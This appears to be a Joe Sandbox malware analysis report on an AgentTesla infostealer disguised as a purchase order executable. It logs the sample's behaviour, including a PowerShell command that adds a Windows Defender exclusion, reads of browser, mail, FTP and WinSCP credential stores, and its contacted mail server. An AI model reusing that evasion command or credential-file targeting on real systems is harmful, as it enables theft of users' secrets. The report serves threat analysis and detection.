                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: PURCHASE ORDER-6350-2024.exe, 00000006.00000002.3269575553.00000000063B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3ab4e38.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3ab4e38.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.3264163729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2053479431.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER-6350-2024.exe PID: 1020, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER-6350-2024.exe PID: 1020, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3ab4e38.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3ab4e38.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.3264163729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2053479431.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER-6350-2024.exe PID: 1020, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		11
                        Process Injection                        		1
                        Masquerading                        		2
                        OS Credential Dumping                        		111
                        Security Software Discovery                        		Remote Services1
                        Email Collection                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Command and Scripting Interpreter                        		Boot or Logon Initialization Scripts1
                        DLL Side-Loading                        		11
                        Disable or Modify Tools                        		1
                        Credentials in Registry                        		1
                        Process Discovery                        		Remote Desktop Protocol11
                        Archive Collected Data                        		1
                        Non-Standard Port                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                        Virtualization/Sandbox Evasion                        		Security Account Manager141
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin Shares2
                        Data from Local System                        		1
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                        Process Injection                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object ModelInput Capture11
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information                        		LSA Secrets1
                        File and Directory Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                        Obfuscated Files or Information                        		Cached Domain Credentials24
                        System Information Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                        Software Packing                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Timestomp                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        DLL Side-Loading                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        PURCHASE ORDER-6350-2024.exe21%ReversingLabsWin32.Trojan.Generic
                        PURCHASE ORDER-6350-2024.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        mail.mbarieservicesltd.com
                        		199.79.62.115
                        		truetrue
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePURCHASE ORDER-6350-2024.exe, 00000000.00000002.2051720668.0000000002A21000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://mail.mbarieservicesltd.comPURCHASE ORDER-6350-2024.exe, 00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            199.79.62.115
                            		mail.mbarieservicesltd.comUnited States
                            		394695PUBLIC-DOMAIN-REGISTRYUStrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1528943
                            Start date and time:2024-10-08 13:52:05 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 0s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:PURCHASE ORDER-6350-2024.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@8/6@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 115
                            • Number of non-executed functions: 5
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: PURCHASE ORDER-6350-2024.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            07:52:54API Interceptor24x Sleep call for process: PURCHASE ORDER-6350-2024.exe modified
                            07:52:56API Interceptor10x Sleep call for process: powershell.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            199.79.62.115order2024-10-07_174915.exeGet hashmaliciousAgentTeslaBrowse
                              PO23100070.exeGet hashmaliciousAgentTeslaBrowse
                                PO-000001488.exeGet hashmaliciousAgentTeslaBrowse
                                  Quote 20240533-REV2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    PO- 220135.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      Quote_4400201477.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        1460531MES_S Quote.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          QUOTE-4K148388-A-C334.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            PO# 81136575.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              PO_GM_list_30082024202003180817418300824.exeGet hashmaliciousAgentTeslaBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                mail.mbarieservicesltd.comorder2024-10-07_174915.exeGet hashmaliciousAgentTeslaBrowse
                                                • 199.79.62.115
                                                PO23100070.exeGet hashmaliciousAgentTeslaBrowse
                                                • 199.79.62.115
                                                PO-000001488.exeGet hashmaliciousAgentTeslaBrowse
                                                • 199.79.62.115
                                                Quote 20240533-REV2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115
                                                PO- 220135.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115
                                                Quote_4400201477.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115
                                                1460531MES_S Quote.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115
                                                QUOTE-4K148388-A-C334.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                PUBLIC-DOMAIN-REGISTRYUSCotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.198.143
                                                shipping.exeGet hashmaliciousAgentTeslaBrowse
                                                • 207.174.215.249
                                                order2024-10-07_174915.exeGet hashmaliciousAgentTeslaBrowse
                                                • 199.79.62.115
                                                shipping.exeGet hashmaliciousAgentTeslaBrowse
                                                • 207.174.215.249
                                                rInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                • 119.18.54.27
                                                Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                • 119.18.54.27
                                                z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                • 119.18.54.27
                                                ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 208.91.199.225
                                                New order.exeGet hashmaliciousAgentTeslaBrowse
                                                • 207.174.215.249
                                                https://octo9.com.ng/Greula/Get hashmaliciousUnknownBrowse
                                                • 208.91.199.242

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASE ORDER-6350-2024.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:true
                                                Reputation:high, very likely benign file
